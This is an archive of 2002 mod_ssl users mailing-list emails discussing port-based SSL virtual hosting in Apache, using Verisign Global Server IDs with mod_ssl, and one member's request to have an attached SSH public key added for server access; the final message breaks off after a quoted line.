From owner-modssl-users@modssl.org  Tue Jul 30 07:44:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA01493; Tue, 30 Jul 2002 07:43:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id HAA01455; Tue, 30 Jul 2002 07:43:00 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id CE4A04CE747; Tue, 30 Jul 2002 07:42:59 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E7C3328672; Tue, 30 Jul 2002 07:39:15 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtpout.mac.com id UAA05928; Mon, 29 Jul 2002 20:53:00 +0200 (MET DST)
Received: from smtp-relay01.mac.com (smtp-relay01-en1 [10.13.10.224])
	by smtpout.mac.com (8.12.1/8.10.2/1.0) with ESMTP id g6TIqrMQ004968
	for ; Mon, 29 Jul 2002 11:52:59 -0700 (PDT)
Received: from asmtp02.mac.com (asmtp02-qfe3 [10.13.10.66])
	by smtp-relay01.mac.com (8.12.1/8.12.1/1.0) with ESMTP id g6TIqrVw000535
	for ; Mon, 29 Jul 2002 11:52:53 -0700 (PDT)
Received: from localhost ([142.177.24.171]) by asmtp02.mac.com
          (Netscape Messaging Server 4.15) with ESMTP id H00XS400.5MJ;
          Mon, 29 Jul 2002 11:52:52 -0700 
Date: Mon, 29 Jul 2002 15:53:15 -0300
Subject: Port-based questions?
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v482)
Cc: modssl-users@modssl.org, users@httpd.apache.org
To: "Danalien" 
From: Jay States 
In-Reply-To: <200207282003.g6SK3Qd24428@d1o900.telia.com>
Message-Id: <709B9EF7-A324-11D6-898C-0003935770DE@mac.com>
Content-Transfer-Encoding: 7bit
X-Mailer: Apple Mail (2.482)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jay States 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I would like to clear up port-based hosting for mod-ssl:

1. https looks for port 443, but you can change that to any port with 
modification to the apache configure file and also as long as you 
specify the port in the url (https;//sample.com:445).

2. Mod-ssl does not work for name based hosting.  Me must use ports in 
order for it to work.

3. Can you specify more than one port to bind https? What if your only 
have 1 ip address and 10 different domain names.  What do you do then?  
Place the domain names behind you firewall and use a class a,b or c ip 
addresses?

4.  If mod-ssl can be placed on more any one port what does the config 
file look like, I keep getting errors.  All the docs I've read said that 
name-based virtual do not work.  They do not say that multiple ports can 
not be specified.

I have been looking for a solid answer for 3 weeks and thanks to all who 
answer my questions.

J
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 09:06:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA09816; Tue, 30 Jul 2002 09:05:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id JAA09734; Tue, 30 Jul 2002 09:04:09 +0200 (MET DST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.9.3+Sun/8.9.3) with ESMTP id JAA18583
	for ; Tue, 30 Jul 2002 09:03:46 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA26084
	for ; Tue, 30 Jul 2002 09:03:46 +0200 (MEST)
X-Authentication-Warning: gate0a.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: Port-based questions?
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Tue, 30 Jul 2002 09:03:45 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA8BFD@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: Port-based questions?
Thread-Index: AcI3MS95pUljdX91SBa4dfAVoZOm/gAYw3VA
From: "Boyle Owen" 
To: "mod_ssl list" 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id JAA09800
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

See below,

Rgds,

Owen Boyle

>From: Jay States [mailto:jstates@mac.com]
>
>I would like to clear up port-based hosting for mod-ssl:
>
>1. https looks for port 443, but you can change that to any port with 
>modification to the apache configure file and also as long as you 
>specify the port in the url (https;//sample.com:445).

Exactly correct. You need to say "Listen 445" in the config and define a VH like "". Then you have to use the port in the URL, as you show (to a browser, "https" means "establish an SSL session with the following server; unless the port is specified, use port 443"). 

>
>2. Mod-ssl does not work for name based hosting...

Kind of the other way around: NBVHing doesn't work with SSL. The reason is that SSL encrypts all the contents of the TCP/IP packet so the traffic has to be routed using only TCP/IP attributes, i.e. IP address and Port number. The "Host" header (which is needed for NBVHing) is an HTTP attribute, i.e. it is inside the packet and so is encrypted so you can't use it to route packets.

> We must use ports in order for it to work.

Yes-ish.. You must distinguish SSL VHs by TCP/IP attributes, i.e. each VH must have a unique IP address:Port pair.

>3. Can you specify more than one port to bind https? What if your only 
>have 1 ip address and 10 different domain names.  What do you 
>do then?  
>Place the domain names behind you firewall and use a class a,b or c ip 
>addresses?

You'd have to use 10 different ports. But you would have to specify the ports in the public URLs. I'm not sure what you're getting at with the FW idea... You can't get away with address translation in the FW adding on the port numbers since the packets are already encrypted when they arrive at the FW.

Having said that, I was astonished some months ago when someone reported a hardware gadget which could route SSL traffic by hostname. It is a kind of SSL router which you put between your server and the internet. I don't know how it works - maybe you have to give it your private server keys so it can decrypt the incoming traffic. I've also forgotten what it was called! Search the archives on this list for SSL routers, hardware etc.. 

Maybe someone else can remember the link to this gadget?

>4.  If mod-ssl can be placed on more any one port what does the config 
>file look like, I keep getting errors.  All the docs I've read 
>said that name-based virtual do not work. 

Because they don't. 

>They do not say that multiple 
>ports can not be specified.

Because they can:

Listen 192.168.1.1:445

  SSLEngine on
  SSLCertificateFile ...
  SSLCertificateKeyFile ...
  DocumentRoot ...
  etc..


Listen 192.168.1.1:446

  SSLEngine on
  SSLCertificateFile ...
  SSLCertificateKeyFile ...
  DocumentRoot ...
  etc..


Note: no need for "NameVirtualHost", no need for "ServerName".
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 09:43:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA13896; Tue, 30 Jul 2002 09:42:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id JAA13881; Tue, 30 Jul 2002 09:41:55 +0200 (MET DST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.9.3+Sun/8.9.3) with ESMTP id JAA21165
	for ; Tue, 30 Jul 2002 09:41:54 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA11822
	for ; Tue, 30 Jul 2002 09:41:54 +0200 (MEST)
X-Authentication-Warning: gate0b.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: simple question
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Tue, 30 Jul 2002 09:41:53 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA8BFE@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: simple question
Thread-Index: AcI3HOueRHeNWHWRT4aScxEYXsuSIQAfx30g
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id JAA13882
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>From: Peter Choe [mailto:choepete@mindspring.com]
>
>i am very new to mod_ssl. i am trying to figure out how to set up some
>specific directories to accept ssl connection. i have looked at the
>documentation and the mail archives, but was unable to 
>decpiher how to do this.
>when i look at the httpd.conf file, i saw a documentroot 
>specifing the root
>directory of my webserver. if i changed that to a directory below, it
>doesn't seem to affect whether or not the root document is no 
>longer ssl
>enable.

The basic idea is that you define a port-based virtual host to serve the SSL content. This looks something like:

Listen 443

  SSLEngine on
  SSLCertificateFile path/to/cert
  SSLCertificateKeyFile path/to/key
  DocumentRoot path/to/ssl/dir
  ...


Now when you hit https://yourserver/ you will get this VH on port 443 via an SSL channel.

Rgds,

Owen Boyle
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 11:58:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA22659; Tue, 30 Jul 2002 11:57:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA22589; Tue, 30 Jul 2002 11:56:14 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 00EFC4CE745; Tue, 30 Jul 2002 11:56:13 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id C2D8B28749; Tue, 30 Jul 2002 11:48:54 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from spiral.inspiral.net id KAA15650; Tue, 30 Jul 2002 10:10:09 +0200 (MET DST)
Received: (from root@localhost)
	by spiral.inspiral.net (8.12.2/8.12.2) id g6U8A3Ri035663
	for modssl-users@modssl.org; Tue, 30 Jul 2002 11:10:03 +0300 (EEST)
	(envelope-from viljo@inspiral.net)
Received: from spiral.inspiral.net (localhost [127.0.0.1])
	by spiral.inspiral.net (8.12.2/8.12.2av) with ESMTP id g6U8A1lU035655
	for ; Tue, 30 Jul 2002 11:10:01 +0300 (EEST)
	(envelope-from viljo@inspiral.net)
Received: from localhost (viljo@localhost)
	by spiral.inspiral.net (8.12.2/8.12.2/Submit) with ESMTP id g6U8A1H5035652
	for ; Tue, 30 Jul 2002 11:10:01 +0300 (EEST)
X-Authentication-Warning: spiral.inspiral.net: viljo owned process doing -bs
Date: Tue, 30 Jul 2002 11:10:01 +0300 (EEST)
From: Viljo Marrandi 
To: modssl-users@modssl.org
Subject: Verisign Global Server ID requires Stronghold
Message-ID: <20020730105807.E26783-100000@spiral.inspiral.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Virus-Scanned: by AMaViS perl-11
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Viljo Marrandi 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

We're making here one secure site and we ordered from Verisign their
Global Server ID and there in ordering form it says that these ID's are
available for platforms like C2Net Apache Stronghold, IBM, Netscape etc.
So do I really have to buy for $1000 USD Stronghold and $700 costing
RedHat or I can use this ID on free Apache/mod_ssl too?

I found out that Stronghold also bases on mod_ssl and I didn't find any
articles saying that these ID's don't work on free servers. Please
enlighten me on this.

Rgds,
Viljo

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 12:10:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA23908; Tue, 30 Jul 2002 12:09:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.staff.tdk.net id MAA23635; Tue, 30 Jul 2002 12:08:42 +0200 (MET DST)
Received: by marvin-lnx.staff.tdk.net (Postfix, from userid 500)
	id 09753BD2E; Tue, 30 Jul 2002 12:09:43 +0200 (CEST)
Date: Tue, 30 Jul 2002 12:09:42 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Verisign Global Server ID requires Stronghold
Message-ID: <20020730100942.GA4327@marvin-lnx.staff.tdk.net>
Mail-Followup-To: modssl-users@modssl.org
References: <20020730105807.E26783-100000@spiral.inspiral.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20020730105807.E26783-100000@spiral.inspiral.net>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, Jul 30, 2002 at 11:10:01AM +0300, Viljo Marrandi wrote:
> Hello,
> 
> We're making here one secure site and we ordered from Verisign their
> Global Server ID and there in ordering form it says that these ID's are
> available for platforms like C2Net Apache Stronghold, IBM, Netscape etc.
> So do I really have to buy for $1000 USD Stronghold and $700 costing
> RedHat or I can use this ID on free Apache/mod_ssl too?
> 
> I found out that Stronghold also bases on mod_ssl and I didn't find any
> articles saying that these ID's don't work on free servers. Please
> enlighten me on this.
> 
They will work just as well on apache with mod_ssl.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 13:09:47 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA28040; Tue, 30 Jul 2002 13:01:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA28017; Tue, 30 Jul 2002 13:00:54 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 616E14CE75C; Tue, 30 Jul 2002 13:00:52 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id A4B372873A; Tue, 30 Jul 2002 13:00:01 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns.krediidipank.ee id MAA26505; Tue, 30 Jul 2002 12:36:01 +0200 (MET DST)
Received: Message by Barricade ns.krediidipank.ee  with ESMTP id g6UAZsJ21479
	for ; Tue, 30 Jul 2002 13:35:54 +0300
Received: from spooler by ekp.ee (Mercury/32 v3.31); 30 Jul 02 13:33:58 +0300
From: "Ma'rt Laak" 
To: modssl-users@modssl.org
Date: Tue, 30 Jul 2002 13:33:35 +0300
MIME-Version: 1.0
Subject: Re: Verisign Global Server ID requires Stronghold
Message-ID: <3D4695AE.26501.5601A78@localhost>
In-reply-to: <20020730105807.E26783-100000@spiral.inspiral.net>
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=ISO-8859-1
Content-description: Mail message body
X-info: Headers changed by Barricade
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from Quoted-printable to 8bit by opensource.ee.ethz.ch id MAA26520
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ma'rt Laak" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You can use Apache+mod_ssl as well - we use fe. 
Put Stronghold into platform.

Regards,
Märt

On 30 Jul 2002 at 11:10, Viljo Marrandi wrote:

> Hello,
> 
> We're making here one secure site and we ordered from Verisign their
> Global Server ID and there in ordering form it says that these ID's
> are available for platforms like C2Net Apache Stronghold, IBM,
> Netscape etc. So do I really have to buy for $1000 USD Stronghold and
> $700 costing RedHat or I can use this ID on free Apache/mod_ssl too?
> 
> I found out that Stronghold also bases on mod_ssl and I didn't find
> any articles saying that these ID's don't work on free servers. Please
> enlighten me on this.
> 
> Rgds,
> Viljo
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 14:35:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA04101; Tue, 30 Jul 2002 14:34:58 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from naxos.pdb.sbs.de id OAA04000; Tue, 30 Jul 2002 14:33:20 +0200 (MET DST)
Received: from trolli.pdb.fsc.net (ThisAddressDoesNotExist [172.25.97.20] (may be forged))
	by naxos.pdb.sbs.de (8.11.2/8.11.2) with ESMTP id g6UCXDE05503
	for ; Tue, 30 Jul 2002 14:33:13 +0200
Received: from deejai2.mch.fsc.net (deejai2.mch.fsc.net [172.25.124.236])
	by trolli.pdb.fsc.net (8.11.6/8.11.6) with ESMTP id g6UCXCQ22559
	for ; Tue, 30 Jul 2002 14:33:12 +0200
Received: (from root@localhost)
	by deejai2.mch.fsc.net (8.12.5/8.12.4) id g6UCXDRb008379
	for modssl-users@modssl.org; Tue, 30 Jul 2002 14:33:13 +0200 (CEST)
	(envelope-from martin@deejai2.mch.fsc.net)
Received: from deejai2.mch.fsc.net (localhost [127.0.0.1])
	by deejai2.mch.fsc.net (8.12.5/8.12.5) with ESMTP id g6UCX2lG008335
	for ; Tue, 30 Jul 2002 14:33:02 +0200 (CEST)
	(envelope-from martin@deejai2.mch.fsc.net)
Received: (from martin@localhost)
	by deejai2.mch.fsc.net (8.12.5/8.12.5/Submit) id g6UCX1n5008334
	for modssl-users@modssl.org; Tue, 30 Jul 2002 14:33:01 +0200 (CEST)
Date: Tue, 30 Jul 2002 14:33:01 +0200
From: Martin Kraemer 
To: modssl-users@modssl.org
Subject: mkraemer@www.engelschall.com
Message-ID: <20020730143301.E78550@deejai2.mch.fsc.net>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="KN5l+BnMqAQyZLvT"
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
X-Operating-System: FreeBSD 4.6-STABLE FreeBSD 4.6-STABLE
X-Organization: Fujitsu Siemens Computers (Muenchen, Germany)
X-Disclaimer: THE COMMENTS CONTAINED IN THIS MESSAGE REFLECT THE VIEWS OF THE  WRITER AND ARE NOT NECESSARILY THE VIEWS OF FUJITSU-SIEMENS COMPUTERS
X-No-Junk-Mail: I do not want to get *any* junk mail.
X-Virus-Scanned: by AMaViS perl-11
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Martin Kraemer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--KN5l+BnMqAQyZLvT
Content-Type: multipart/mixed; boundary="yNb1oOkm5a9FJOVX"
Content-Disposition: inline


--yNb1oOkm5a9FJOVX
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Hallo Ralf,

Ich habe Probleme, mich mit {www,en5}.engelschall.com bzw. www.openssl.org
per ssh zu verbinden. Meine Kennung dort war mkraemer@www.engelschall.com.
Und in meiner authorized_keys war mein RSA1 pub key, trotzdem laesst mich
die Maschine nun nicht mehr rein.

Was hat sich geaendert?

Kannst Du evtl. meinen DSA-Public Key in meiner authorized_keys ablegen?
Ich haenge ihn an.

Tausend Dank,

   Martin
--=20
         |     Fujitsu Siemens
Fon: +49-89-636-46021, FAX: +49-89-636-47655 | 81730  Munich,  Germany

--yNb1oOkm5a9FJOVX
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="id_dsa.pub"

ssh-dss AAAAB3NzaC1kc3MAAACBANfuqxUCUdd6bQoRfDcOZ+WINv376gC3XXJ0uEgzmdKf1bJIqpnTm1x0xW8LA7DNm+fBphUcIUDkk9fsDDcEOaRc384waLNQTXA7u0BnipvzQuJAshLeChR7pZvymng+SXa1T6oMNjqEPsg7Bu1z7KBqSbtO6RBNB5lKRE7UuyTVAAAAFQCe7Mt1dqef7Nbee6JF9KsrbdU8iwAAAIAHSXTssiuKjHr8TKnxRyrV313Fx3HOTVLi3mPJS1nd4W/nBR0uIAAvJyTiEdJnXTQ+x1Y5zSFmuUcHI9NR+Io1j98VGAzbQ+XKH3lF8k1CMczWwYoCLhLVo1MPxgJGtaUWUfk60LrB9qin7W9kHMRnDgpTg9k4rRH++3bZOgPIjQAAAIEAmdRT/f546qE0i6JvS59EIzDdf0urYmMLCLAIY0u+/R38eDlXnuORmIqqAXhJkerSUPgXl582OGAoCz0gp1fd/1khU+1SGxBPEKKV88IzxBrI5PPQI/ayrKpkcmhTckkltL4hmdTJsJZtfITfOAkrvS4+oZNVIodGm0cSelrno3U= martin@deejai2.mch.fsc.net

--yNb1oOkm5a9FJOVX--

--KN5l+BnMqAQyZLvT
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
MessageID: w9i91A3BHIu0Im/QcxwiReGbXHCAE7iU

iQB1AwUBPUaHejYq11iPOU49AQEGkwL/fZjJXF1l9xZtG8j0ugeG9ckHQrt6Yvvu
VBBlsLb6F5kfHoaWgibxstvNWRn1MoaLR3oC7gudl7vYUDhpxD+9QsYoxpblFQ9H
FuXD8d5K3fDjED3vt/dzdDMjXyf8zQOf
=iIBn
-----END PGP SIGNATURE-----

--KN5l+BnMqAQyZLvT--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 15:22:35 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA07575; Tue, 30 Jul 2002 15:21:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from spiral.inspiral.net id PAA07392; Tue, 30 Jul 2002 15:19:42 +0200 (MET DST)
Received: (from root@localhost)
	by spiral.inspiral.net (8.12.2/8.12.2) id g6UDJflC037959
	for modssl-users@modssl.org; Tue, 30 Jul 2002 16:19:41 +0300 (EEST)
	(envelope-from viljo@inspiral.net)
Received: from spiral.inspiral.net (localhost [127.0.0.1])
	by spiral.inspiral.net (8.12.2/8.12.2av) with ESMTP id g6UDJdlU037951
	for ; Tue, 30 Jul 2002 16:19:39 +0300 (EEST)
	(envelope-from viljo@inspiral.net)
Received: from localhost (viljo@localhost)
	by spiral.inspiral.net (8.12.2/8.12.2/Submit) with ESMTP id g6UDJddT037948
	for ; Tue, 30 Jul 2002 16:19:39 +0300 (EEST)
X-Authentication-Warning: spiral.inspiral.net: viljo owned process doing -bs
Date: Tue, 30 Jul 2002 16:19:39 +0300 (EEST)
From: Viljo Marrandi 
To: modssl-users@modssl.org
Subject: Does Verisign Global Server ID requires Stronghold?
Message-ID: <20020730161833.I37785-100000@spiral.inspiral.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Virus-Scanned: by AMaViS perl-11
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Viljo Marrandi 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

Before I wasn't subscribed to the list, so sorry if this comes twice.

We're making here one secure site and we ordered from Verisign their
Global Server ID and there in ordering form it says that these ID's are
available for platforms like C2Net Apache Stronghold, IBM, Netscape etc.
So do I really have to buy for $1000 USD Stronghold and $700 costing
RedHat or I can use this ID on free Apache/mod_ssl too?

I found out that Stronghold also bases on mod_ssl and I didn't find any
articles saying that these ID's don't work on free servers. Please
enlighten me on this.

Rgds,
Viljo



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 15:31:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA08354; Tue, 30 Jul 2002 15:30:51 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtpzilla5.xs4all.nl id PAA08224; Tue, 30 Jul 2002 15:29:23 +0200 (MET DST)
Received: from xerxes (213-84-222-81.adsl.xs4all.nl [213.84.222.81])
	by smtpzilla5.xs4all.nl (8.12.0/8.12.0) with SMTP id g6UDTMql065095
	for ; Tue, 30 Jul 2002 15:29:22 +0200 (CEST)
Message-ID: <006401c237cd$1f603fa0$0501a8c0@xerxes>
From: "M.E. Post" 
To: 
References: <20020730161833.I37785-100000@spiral.inspiral.net>
Subject: Re: Does Verisign Global Server ID requires Stronghold?
Date: Tue, 30 Jul 2002 15:29:24 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1050
Disposition-Notification-To: "M.E. Post" 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1050
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "M.E. Post" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

----- Original Message -----
From: "Viljo Marrandi" 
To: 
Sent: Tuesday, July 30, 2002 3:19 PM
Subject: Does Verisign Global Server ID requires Stronghold?


> Hello,
>
> Before I wasn't subscribed to the list, so sorry if this comes twice.
>
> We're making here one secure site and we ordered from Verisign their
> Global Server ID and there in ordering form it says that these ID's are
> available for platforms like C2Net Apache Stronghold, IBM, Netscape etc.
> So do I really have to buy for $1000 USD Stronghold and $700 costing
> RedHat or I can use this ID on free Apache/mod_ssl too?
>
> I found out that Stronghold also bases on mod_ssl and I didn't find any
> articles saying that these ID's don't work on free servers. Please
> enlighten me on this.

Trust me, you can use these global server id's as well for plain old Apache
with mod_ssl, I've used them myself. Questions is whether you really want a
global server id? The only difference (besides price) between the two is
that the global server id let's your clients "step-up" to 128 bit encryption
IF the client is an older export-crippled browser (IE < 5.01, NS < 4.5). The
standard secure server id also can do 128 bit encryption if the client
browser is 128 bit native.

If your clients all use relatively modern browsers (IE > 5.0 and NN > 4.5)
than you don't need to spend the extra cash, your clients can use the secure
server id and have strong encryption.

hth

Meint

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 16:12:28 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA10865; Tue, 30 Jul 2002 16:08:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id QAA10736; Tue, 30 Jul 2002 16:07:10 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 44AED4CE754; Tue, 30 Jul 2002 16:07:06 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id AB05128749; Tue, 30 Jul 2002 16:04:26 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pascal.arago.de id OAA01771; Tue, 30 Jul 2002 14:02:01 +0200 (MET DST)
Received: Received: (from uucp@localhost)
	by pascal.arago.de id g6UBVN916798654
	for modssl-users@modssl.org; Tue, 30 Jul 2002 13:31:23 +0200 (METDST)
Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de"
 via SMTP by pascal.arago.de, id smtpdAAAa0xkY9; Tue Jul 30 13:31:13 2002
Received: from ohm.arago.de (localhost [127.0.0.1])
	by carat.arago.de (8.9.3/8.9.3) with SMTP id NAA01045
	for ; Tue, 30 Jul 2002 13:30:46 +0200 (MET DST)
Received: (from gryf@localhost)
	by ohm.arago.de (SGI-8.9.3/8.9.3) id NAA85546
	for modssl-users@modssl.org; Tue, 30 Jul 2002 13:30:59 +0200 (METDST)
Date: Tue, 30 Jul 2002 13:30:59 +0200
From: Thomas Binder 
To: modssl-users@modssl.org
Subject: Re: Verisign Global Server ID requires Stronghold
Message-ID: <20020730133059.A8149324@ohm.arago.de>
Mail-Followup-To: modssl-users@modssl.org
References: <20020730105807.E26783-100000@spiral.inspiral.net> <20020730100942.GA4327@marvin-lnx.staff.tdk.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20020730100942.GA4327@marvin-lnx.staff.tdk.net>; from mads@toftum.dk on Tue, Jul 30, 2002 at 12:09:42PM +0200
Organization: arago GmbH
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Thomas Binder 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi!

On Tue, Jul 30, 2002 at 12:09:42PM +0200, Mads Toftum wrote:
> They will work just as well on apache with mod_ssl.

